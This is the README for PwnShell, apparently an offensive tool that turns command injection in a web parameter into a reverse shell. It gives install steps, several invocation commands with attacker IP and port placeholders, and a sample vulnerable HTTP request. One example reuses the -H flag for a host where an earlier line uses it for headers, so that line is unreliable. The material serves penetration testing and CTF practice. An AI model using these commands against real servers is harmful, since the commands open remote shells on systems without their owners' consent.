```sh
git clone https://github.com/zAbuQasem/PwnShell
cd PwnShell/
pip3 install -r requirements.txt
chmod +x pwnshell.py
```

```sh
./pwnshell.py -i [Attacker-IP] -f [REQUEST FILE] -s  # -s: use the https prefix
```

- Copy the request from Burp or the browser's Network tab.
- Replace the vulnerable place in the parameter with 'PWNME'.

```http
GET /Vulnerable.php?cmd=PWNME HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```

```sh
./pwnshell.py -i [Attacker-IP] -p [Attacker-Port] -u [TARGET-URL] -m [REQUEST-METHOD] -c [COOKIES (optional)] -H [HEADERS (optional)]
```

```sh
./pwnshell.py -i [Attacker-IP] -u 'http/s://<TARGET>/vulnerable.php?cmd=PWNME' --method GET --cookies '{"key" : "value"}'
```

- Replace the vulnerable place in the parameter with 'PWNME'.

```sh
./pwnshell.py -H 127.0.0.1 -u 'http://10.10.10.10/vulnerable.php?cmd=PWNME'
```

Zeyad AbuQasem - LinkedIn
Omar Albalouli - LinkedIn & Github